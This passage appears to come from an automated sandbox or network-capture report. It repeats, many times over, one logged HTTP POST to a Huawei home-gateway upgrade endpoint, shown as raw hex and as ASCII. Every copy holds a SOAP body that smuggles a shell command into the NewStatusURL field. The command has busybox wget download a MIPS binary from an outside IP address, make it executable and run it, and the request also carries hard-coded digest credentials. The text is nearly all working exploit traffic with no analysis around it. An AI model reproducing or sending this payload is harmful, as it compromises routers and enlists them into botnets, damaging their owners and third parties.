62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 48 69 6c 69 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 37.0.9.202 -l /tmp/binary -r /bins/Hilix.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 33 37 2e 30 2e 39 2e 32 30 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 48 69 6c 69 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 37.0.9.202 -l /tmp/binary -r /bins/Hilix.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 33 37 2e 30 2e 39 2e 32 30 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 48 69 6c 69 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 37.0.9.202 -l /tmp/binary -r /bins/Hilix.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 33 37 2e 30 2e 39 2e 32 30 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 48 69 6c 69 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 37.0.9.202 -l /tmp/binary -r /bins/Hilix.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 33 37 2e 30 2e 39 2e 32 30 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 48 69 6c 69 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 37.0.9.202 -l /tmp/binary -r /bins/Hilix.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 33 37 2e 30 2e 39 2e 32 30 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 48 69 6c 69 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 37.0.9.202 -l /tmp/binary -r /bins/Hilix.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 33 37 2e 30 2e 39 2e 32 30 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 48 69 6c 69 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 37.0.9.202 -l /tmp/binary -r /bins/Hilix.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 33 37 2e 30 2e 39 2e 32 30 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 48 69 6c 69 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 37.0.9.202 -l /tmp/binary -r /bins/Hilix.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 33 37 2e 30 2e 39 2e 32 30 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 48 69 6c 69 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 37.0.9.202 -l /tmp/binary -r /bins/Hilix.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 33 37 2e 30 2e 39 2e 32 30 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 48 69 6c 69 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope 